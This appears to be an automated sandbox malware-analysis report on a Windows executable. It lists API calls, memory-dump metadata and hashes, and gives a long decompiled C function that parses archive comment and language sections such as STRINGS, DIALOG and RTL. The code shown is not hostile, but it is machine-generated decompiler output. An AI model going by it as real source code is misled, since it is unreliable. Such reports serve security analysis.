                                            0x00c4bf14
                                            0x00c4bf19
                                            0x00c4bf21
                                            0x00c4bf2d
                                            0x00c4bf2d
                                            0x00c4bf3a
                                            0x00c4bf3f
                                            0x00c4bf47
                                            0x00c4bf51
                                            0x00c4bf5e
                                            0x00c4bf65
                                            0x00c4bf65
                                            0x00c4bf71
                                            0x00c4bf78
                                            0x00c4bf7d
                                            0x00c4bf85
                                            0x00c4bf8b
                                            0x00c4bf8c
                                            0x00c4bf8d
                                            0x00c4bf8f
                                            0x00c4bf8f
                                            0x00c4bfa4
                                            0x00c4bfa9
                                            0x00c4bfb5
                                            0x00c4bfb7
                                            0x00c4bfc8
                                            0x00c4bfd5
                                            0x00000000
                                            0x00c4bfb9
                                            0x00c4bfc4
                                            0x00c4bfc6
                                            0x00c4bfda
                                            0x00c4bfda
                                            0x00c4bfdc
                                            0x00c4bfe2
                                            0x00c4bfe8
                                            0x00c4bff6
                                            0x00c4bffb
                                            0x00c4bffc
                                            0x00c4c004
                                            0x00c4c009
                                            0x00c4c010
                                            0x00c4c016
                                            0x00c4c018
                                            0x00c4c01e
                                            0x00c4c024
                                            0x00c4c026
                                            0x00c4c02f
                                            0x00c4c032
                                            0x00c4c034
                                            0x00c4c03d
                                            0x00c4c040
                                            0x00c4c046
                                            0x00c4c049
                                            0x00c4c052
                                            0x00c4c061
                                            0x00c4c066
                                            0x00c4c06e
                                            0x00c4c070
                                            0x00c4c071
                                            0x00c4c077
                                            0x00c4c078
                                            0x00c4c07a
                                            0x00c4c07f
                                            0x00c4c07f
                                            0x00000000
                                            0x00c4c06e
                                            0x00000000
                                            0x00c4bfc6
                                            0x00c4bfb7
                                            0x00000000
                                            0x00c4c087
                                            0x00c4c08a
                                            0x00c4c08c
                                            0x00c4c08c
                                            0x00000000
                                            0x00000000
                                            0x00c4bab8
                                            0x00c4bac0
                                            0x00c4bac6
                                            0x00c4bac9
                                            0x00c4baed
                                            0x00c4bacb
                                            0x00c4bacb
                                            0x00c4bace
                                            0x00c4bae1
                                            0x00c4bad0
                                            0x00c4bad0
                                            0x00c4bad2
                                            0x00c4bad7
                                            0x00c4bad7
                                            0x00c4bace
                                            0x00000000
                                            0x00000000
                                            0x00c4bb31
                                            0x00c4bb32
                                            0x00c4bb37
                                            0x00c4bb37
                                            0x00c4bb37
                                            0x00c4bb3a
                                            0x00c4bb3f
                                            0x00c4bb45
                                            0x00c4bb45
                                            0x00c4bb4b
                                            0x00c4bb51
                                            0x00c4bb51
                                            0x00000000
                                            0x00000000
                                            0x00c4b52a
                                            0x00c4b52c
                                            0x00c4b531
                                            0x00c4b537
                                            0x00c4b53a
                                            0x00000000
                                            0x00c4b53c
                                            0x00c4b53c
                                            0x00000000
                                            0x00c4b53c
                                            0x00c4c093
                                            0x00c4c093
                                            0x00c4c098
                                            0x00c4c09c
                                            0x00c4c0a0
                                            0x00c4c0a7
                                            0x00c4c0ae
                                            0x00c4c0b1
                                            0x00c4c0b6
                                            0x00c4c0b9
                                            0x00c4c0bc
                                            0x00c4c0c6

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C4B4CC
                                              • Part of subcall function 00C4A156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00C4A21E
                                            • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00C4ADDF,?,00000000), ref: 00C4B601
                                            • GetFileAttributesW.KERNEL32(?), ref: 00C4B6BB
                                            • DeleteFileW.KERNEL32(?), ref: 00C4B6C9
                                            • SetWindowTextW.USER32(?,?), ref: 00C4B812
                                            • _wcsrchr.LIBVCRUNTIME ref: 00C4B99C
                                            • GetDlgItem.USER32(?,00000066), ref: 00C4B9D7
                                            • SetWindowTextW.USER32(00000000,?), ref: 00C4B9E7
                                            • SendMessageW.USER32(00000000,00000143,00000000,00C79602), ref: 00C4B9FB
                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C4BA24
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                            • API String ID: 3676479488-312220925
                                            • Opcode ID: 00aacb90bbcb20d5c6ae1a8581895944698966d3e542451d6f01e604bf3455f9
                                            • Instruction ID: 2bfdb62d6c4f6134c385d2ed4f241261f1118b2f187dfaf3759e37b7c35ea0d8
                                            • Opcode Fuzzy Hash: 00aacb90bbcb20d5c6ae1a8581895944698966d3e542451d6f01e604bf3455f9
                                            • Instruction Fuzzy Hash: 60E17076900119AAEF24EBA5DD85EDE73BCAF05350F0041A6F919E7051EF709F849BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3CFD0, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00C3CFD0(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				signed int _t318;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t318 = __ecx;
				_t392 = _t391 - 0x6c;
				E00C4D870(E00C613DF, _t390);
				E00C4D940();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = _t318;
				_t390[0x11] = _t196;
				_t390[0x12] = _t387;
				_t197 = E00C50BB8(_t318);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E00C3FAB1(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E00C3B943(_t396, _t390 - 0x1264))) = 0;
					E00C3FA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E00C3943C(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E00C39768(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E00C3946E(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0xc6d5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E00C55030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00C3CC62);
						E00C55030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E00C3CBC7);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E00C39B57();
							_t294 = E00C39979(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E00C39A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E00C55460(_t390 - 0x4286 + _t384, 0xc6261c, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E00C54DA0(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E00C55460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E00C39A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E00C52B53(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E00C39979(_t370, _t382, 0x200000);
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E00C52B53(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E00C40FDE(_t382, _t212, _t330 + 1);
							L00C52B4E(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E00C3FA56(_t390 - 0xd4, 0xc62624, 0x64);
							_push(0x20002);
							_t218 = E00C52B53(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E00C3CB33(_t387, _t371, _t390, _t218, _t336);
									L00C52B4E(_t390[0x1a]);
									L00C52B4E(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0xc70124 =  *((intOrPtr*)(_t387 + 0x28));
										E00C55030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E00C3CD08);
										E00C55030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E00C3CD37);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00C43393(_t387 + 0x3c, _t371, _t316);
										E00C43393(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E00C3CB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E00C3F91A( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E00C3FAB1(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E00C54E1D(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E00C411FA(_t390 - 0x264, _t390 - 0x138, 0x64);
											E00C3FA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E00C3FA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E00C3FA56(_t390, _t390 - 0x70, 0x32);
											_t262 = E00C54E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00C3CCED);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0xc6d150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t390[0x18] = E00C52B33( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
											_t272 = E00C54DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												_t132 =  &(_t390[0x15]); // 0x9
												__eflags = _t351 -  *_t132;
												if(_t351 !=  *_t132) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E00C411FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E00C3D9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E00C52B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E00C3FA56(_t390 - 0xd4, 0xc62624, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L00C52B4E(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00C43393(_t387, _t370, _t380);
						E00C43393(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0xc6d5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}








































































                                            0x00c3cfd0
                                            0x00c3cfd0
                                            0x00c3cfd1
                                            0x00c3cfd9
                                            0x00c3cfe3
                                            0x00c3cfed
                                            0x00c3cfee
                                            0x00c3cfef
                                            0x00c3cff2
                                            0x00c3cff4
                                            0x00c3cff7
                                            0x00c3cffa
                                            0x00c3d000
                                            0x00c3d002
                                            0x00c3d005
                                            0x00c3d00b
                                            0x00c3d047
                                            0x00c3d00d
                                            0x00c3d015
                                            0x00c3d02d
                                            0x00c3d037
                                            0x00c3d037
                                            0x00c3d052
                                            0x00c3d057
                                            0x00c3d05f
                                            0x00c3d062
                                            0x00c3d070
                                            0x00c3d42d
                                            0x00c3d433
                                            0x00c3d43e
                                            0x00c3d449
                                            0x00c3d076
                                            0x00c3d076
                                            0x00c3d078
                                            0x00c3d07e
                                            0x00c3d09c
                                            0x00c3d0a8
                                            0x00c3d0ba
                                            0x00c3d0bf
                                            0x00c3d0c2
                                            0x00c3d0c5
                                            0x00c3d0c8
                                            0x00c3d0cb
                                            0x00c3d0ce
                                            0x00c3d0e2
                                            0x00c3d0f7
                                            0x00c3d0fc
                                            0x00c3d0ff
                                            0x00c3d101
                                            0x00c3d101
                                            0x00c3d104
                                            0x00c3d109
                                            0x00c3d1c8
                                            0x00c3d1c8
                                            0x00c3d1cb
                                            0x00c3d1ce
                                            0x00c3d1df
                                            0x00c3d1e7
                                            0x00c3d1e8
                                            0x00c3d1eb
                                            0x00c3d1f0
                                            0x00000000
                                            0x00000000
                                            0x00c3d1f6
                                            0x00c3d1f9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d1f9
                                            0x00000000
                                            0x00c3d10f
                                            0x00c3d117
                                            0x00c3d142
                                            0x00c3d144
                                            0x00c3d14d
                                            0x00c3d178
                                            0x00c3d180
                                            0x00c3d1ac
                                            0x00c3d1ac
                                            0x00c3d1b0
                                            0x00000000
                                            0x00000000
                                            0x00c3d1b2
                                            0x00000000
                                            0x00c3d18c
                                            0x00c3d19c
                                            0x00c3d1a1
                                            0x00c3d1a6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d1a6
                                            0x00c3d180
                                            0x00c3d155
                                            0x00c3d15b
                                            0x00c3d16c
                                            0x00c3d171
                                            0x00c3d176
                                            0x00c3d1ba
                                            0x00000000
                                            0x00c3d1ba
                                            0x00c3d176
                                            0x00000000
                                            0x00c3d123
                                            0x00c3d133
                                            0x00c3d138
                                            0x00c3d13d
                                            0x00c3d1be
                                            0x00c3d1be
                                            0x00c3d1c1
                                            0x00c3d1c3
                                            0x00000000
                                            0x00c3d1c3
                                            0x00c3d13f
                                            0x00000000
                                            0x00c3d13f
                                            0x00c3d117
                                            0x00c3d10f
                                            0x00c3d208
                                            0x00c3d20b
                                            0x00c3d210
                                            0x00c3d21a
                                            0x00c3d21c
                                            0x00c3d220
                                            0x00c3d222
                                            0x00000000
                                            0x00000000
                                            0x00c3d239
                                            0x00c3d23e
                                            0x00c3d241
                                            0x00c3d243
                                            0x00c3d253
                                            0x00c3d254
                                            0x00c3d259
                                            0x00c3d25d
                                            0x00c3d25f
                                            0x00000000
                                            0x00000000
                                            0x00c3d265
                                            0x00c3d268
                                            0x00c3d26b
                                            0x00c3d26f
                                            0x00c3d275
                                            0x00c3d27a
                                            0x00c3d27e
                                            0x00c3d281
                                            0x00c3d284
                                            0x00c3d284
                                            0x00c3d289
                                            0x00c3d28b
                                            0x00c3d28d
                                            0x00c3d28d
                                            0x00c3d293
                                            0x00c3d2a3
                                            0x00c3d2a8
                                            0x00c3d2ad
                                            0x00c3d2b2
                                            0x00c3d2b6
                                            0x00c3d2b8
                                            0x00c3d2c6
                                            0x00c3d2ca
                                            0x00c3d2cc
                                            0x00c3d2ce
                                            0x00c3d2d1
                                            0x00c3d2d4
                                            0x00c3d2d6
                                            0x00c3d2d9
                                            0x00c3d3c1
                                            0x00c3d3ca
                                            0x00c3d3d2
                                            0x00c3d3da
                                            0x00c3d3e1
                                            0x00c3d3e4
                                            0x00c3d3fe
                                            0x00c3d40b
                                            0x00c3d413
                                            0x00c3d425
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d3e6
                                            0x00c3d3e6
                                            0x00c3d3ea
                                            0x00c3d3f3
                                            0x00c3d3f8
                                            0x00c3d3f9
                                            0x00c3d3f9
                                            0x00000000
                                            0x00c3d3e6
                                            0x00c3d2df
                                            0x00c3d2e6
                                            0x00c3d2ed
                                            0x00c3d2f4
                                            0x00c3d2f4
                                            0x00c3d2f7
                                            0x00c3d2f9
                                            0x00c3d5f5
                                            0x00c3d5f5
                                            0x00c3d5f9
                                            0x00c3d5fa
                                            0x00c3d5fd
                                            0x00000000
                                            0x00000000
                                            0x00c3d603
                                            0x00c3d607
                                            0x00c3d659
                                            0x00c3d65a
                                            0x00c3d65d
                                            0x00c3d683
                                            0x00c3d690
                                            0x00c3d695
                                            0x00c3d698
                                            0x00c3d69a
                                            0x00c3d67b
                                            0x00c3d67b
                                            0x00000000
                                            0x00c3d67b
                                            0x00c3d661
                                            0x00c3d662
                                            0x00c3d665
                                            0x00000000
                                            0x00000000
                                            0x00c3d667
                                            0x00c3d667
                                            0x00c3d66d
                                            0x00000000
                                            0x00000000
                                            0x00c3d676
                                            0x00c3d67a
                                            0x00c3d67a
                                            0x00000000
                                            0x00c3d67a
                                            0x00c3d609
                                            0x00c3d60f
                                            0x00000000
                                            0x00000000
                                            0x00c3d619
                                            0x00c3d619
                                            0x00c3d61c
                                            0x00c3d643
                                            0x00c3d645
                                            0x00c3d648
                                            0x00c3d649
                                            0x00c3d64d
                                            0x00c3d64e
                                            0x00c3d651
                                            0x00000000
                                            0x00c3d651
                                            0x00c3d61e
                                            0x00c3d61e
                                            0x00c3d621
                                            0x00c3d63f
                                            0x00000000
                                            0x00c3d63f
                                            0x00c3d623
                                            0x00c3d623
                                            0x00c3d626
                                            0x00c3d63b
                                            0x00000000
                                            0x00c3d63b
                                            0x00c3d628
                                            0x00c3d628
                                            0x00c3d62b
                                            0x00c3d637
                                            0x00000000
                                            0x00c3d637
                                            0x00c3d62e
                                            0x00c3d631
                                            0x00000000
                                            0x00000000
                                            0x00c3d633
                                            0x00000000
                                            0x00c3d633
                                            0x00c3d2ff
                                            0x00c3d304
                                            0x00c3d308
                                            0x00c3d314
                                            0x00c3d316
                                            0x00c3d317
                                            0x00c3d31b
                                            0x00c3d508
                                            0x00c3d50b
                                            0x00c3d512
                                            0x00c3d517
                                            0x00c3d519
                                            0x00c3d5ef
                                            0x00c3d5ef
                                            0x00c3d5f2
                                            0x00000000
                                            0x00c3d5f2
                                            0x00c3d52b
                                            0x00c3d53c
                                            0x00c3d541
                                            0x00c3d546
                                            0x00c3d548
                                            0x00000000
                                            0x00000000
                                            0x00c3d550
                                            0x00c3d563
                                            0x00c3d575
                                            0x00c3d587
                                            0x00c3d596
                                            0x00c3d5ab
                                            0x00c3d5b0
                                            0x00c3d5b3
                                            0x00c3d5b5
                                            0x00c3d5b7
                                            0x00c3d5b7
                                            0x00c3d5ba
                                            0x00c3d5c0
                                            0x00c3d5c0
                                            0x00c3d5d3
                                            0x00c3d5d3
                                            0x00c3d5d5
                                            0x00c3d5d8
                                            0x00c3d5d9
                                            0x00c3d5d9
                                            0x00c3d5dd
                                            0x00c3d5e0
                                            0x00000000
                                            0x00000000
                                            0x00c3d5e2
                                            0x00c3d5e2
                                            0x00c3d5e2
                                            0x00c3d5e6
                                            0x00c3d3af
                                            0x00c3d3af
                                            0x00000000
                                            0x00c3d3af
                                            0x00c3d5ec
                                            0x00c3d5ec
                                            0x00c3d5d9
                                            0x00c3d5dd
                                            0x00c3d5e0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3d5e0
                                            0x00c3d5d9
                                            0x00c3d321
                                            0x00c3d324
                                            0x00c3d324
                                            0x00c3d327
                                            0x00c3d32a
                                            0x00c3d331
                                            0x00c3d338
                                            0x00c3d33f
                                            0x00c3d346
                                            0x00c3d349
                                            0x00c3d35a
                                            0x00c3d361
                                            0x00c3d366
                                            0x00c3d36b
                                            0x00c3d36c
                                            0x00c3d36e
                                            0x00c3d386
                                            0x00c3d386
                                            0x00000000
                                            0x00c3d386
                                            0x00c3d373
                                            0x00c3d375
                                            0x00c3d37a
                                            0x00000000
                                            0x00000000
                                            0x00c3d37c
                                            0x00c3d37e
                                            0x00c3d381
                                            0x00c3d389
                                            0x00c3d389
                                            0x00c3d38a
